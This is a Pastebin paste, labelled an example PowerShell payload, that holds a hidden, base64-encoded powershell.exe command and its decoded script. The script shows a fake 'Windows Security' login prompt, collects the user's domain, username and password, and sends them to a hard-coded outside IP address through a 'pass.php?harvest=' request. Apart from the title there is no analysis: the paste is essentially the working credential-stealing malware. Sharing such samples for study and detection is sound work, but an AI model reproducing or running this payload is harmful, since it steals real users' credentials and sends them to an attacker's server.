daily pastebin goal
45%
SHARE
TWEET

Example Powershell payload from @JohnLaTwC

a guest Sep 25th, 2016 72 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -nop -win hidden -noni -enc ZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBMAG8AZwBpAG4AUAByAG8AbQBwAHQACgB7AAoAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACIAUwB5AHMAdABlAG0ALgB3AGUAYgAiACkACgAkAGMAcgBlAGQAIAA9ACAAJABIAG8AcwB0AC4AdQBpAC4AUAByAG8AbQBwAHQARgBvAHIAQwByAGUAZABlAG4AdABpAGEAbAAoACIAVwBpAG4AZABvAHcAcwAgAFMAZQBjAHUAcgBpAHQAeQAiACwAIAAiAFAAbABlAGEAcwBlACAAZQBuAHQAZQByACAAdQBzAGUAcgAgAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAiACwAIAAiACQAZQBuAHYAOgB1AHMAZQByAGQAbwBtAGEAaQBuAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQAiACwAIgAiACkACgAkAHUAcwBlAHIAbgBhAG0AZQAgAD0AIAAiACQAZQBuAHYAOgB1AHMAZQByAG4AYQBtAGUAIgAKACQAZABvAG0AYQBpAG4AIAA9ACAAIgAkAGUAbgB2ADoAdQBzAGUAcgBkAG8AbQBhAGkAbgAiAAoAJABmAHUAbABsACAAPQAgACIAJABkAG8AbQBhAGkAbgAiACAAKwAgACIAIgAgACsAIAAiACQAdQBzAGUAcgBuAGEAbQBlACIACgAkAHAAYQBzAHMAdwBvAHIAZAAgAD0AIAAkAGMAcgBlAGQALgBHAGUAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAKAApAC4AcABhAHMAcwB3AG8AcgBkAAoAJABvAHUAdABwAHUAdAAgAD0AIAAkAG4AZQB3AGMAcgBlAGQAIAA9ACAAJABjAHIAZQBkAC4ARwBlAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsACgAKQAgAHwAIABzAGUAbABlAGMAdAAtAG8AYgBqAGUAYwB0ACAAVQBzAGUAcgBOAGEAbQBlACwAIABEAG8AbQBhAGkAbgAsACAAUABhAHMAcwB3AG8AcgBkAAoAJAB1AHMAZQByAG4AYQBtAGUAIAA9ACAAJABvAHUAdABwAHUAdAAuAFUAcwBlAHIATgBhAG0AZQAKAFMAZQBuAGQALQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAKAAkAHUAcwBlAHIAbgBhAG0AZQAsACAAJABwAGEAcwBzAHcAbwByAGQALAAgACQAZABvAG0AYQBpAG4AKQAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAFMAZQBuAGQALQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAKAAkAHUAcwBlAHIAbgBhAG0AZQAsACAAJABwAGEAcwBzAHcAbwByAGQALAAgACQAZABvAG0AYQBpAG4AKQAKAHsACgAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsACgAkAHUAcwBlAHIAbgBhAG0AZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVwBlAGIALgBIAHQAdABwAFUAdABpAGwAaQB0AHkAXQA6ADoAVQByAGwARQBuAGMAbwBkAGUAKAAkAHUAcwBlAHIAbgBhAG0AZQApADsACgAkAGYAdQBsAGwAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFcAZQBiAC4ASAB0AHQAcABVAHQAaQBsAGkAdAB5AF0AOgA6AFUAcgBsAEUAbgBjAG8AZABlACgAJABmAHUAbABsACkAOwAKACQAcgBlAHMAIAA9ACAAJAB3AGMALgBkAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANgA5AC4AMQA0ADMALgAxADIAMwAuADcAMQAvAHAAYQBzAHMALgBwAGgAcAA/AGgAYQByAHYAZQBzAHQAPQAkAHUAcwBlAHIAbgBhAG0AZQAmAG0AaQBzAGMAPQAkAGYAdQBsAGwAIgApAAoAfQAKAAoASQBuAHYAbwBrAGUALQBMAG8AZwBpAG4AUAByAG8AbQBwAHQACgBTAGUAbgBkAC0AQwByAGUAZABlAG4AdABpAGEAbABzAA==
  2. -->
  3. function Invoke-LoginPrompt{[System.Reflection.Assembly]::LoadWithPartialName("System.web")
  4.     $cred = $Host.ui.PromptForCredential("Windows Security", "Please enter user credentials", "$env:userdomain\$env:username","")
  5.     $username = "$env:username"
  6.     $domain = "$env:userdomain"
  7.     $full = "$domain" + "" + "$username"$password = $cred.GetNetworkCredential().password$output = $newcred = $cred.GetNetworkCredential()
  8.     | select-object UserName, Domain, Password$username = $output.UserNameSend-Credentials($username, $password, $domain)
  9. }
  10. function Send-Credentials($username, $password, $domain)
  11. {
  12.     $wc = New-Object system.Net.WebClient;
  13.     $username = [System.Web.HttpUtility]::UrlEncode($username);
  14.     $full = [System.Web.HttpUtility]::UrlEncode($full);
  15.     $res = $wc.downloadString("http://69.143.123.71/pass.php?harvest=$username&misc=$full")
  16. }
  17. Invoke-LoginPromptSend-Credentials
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top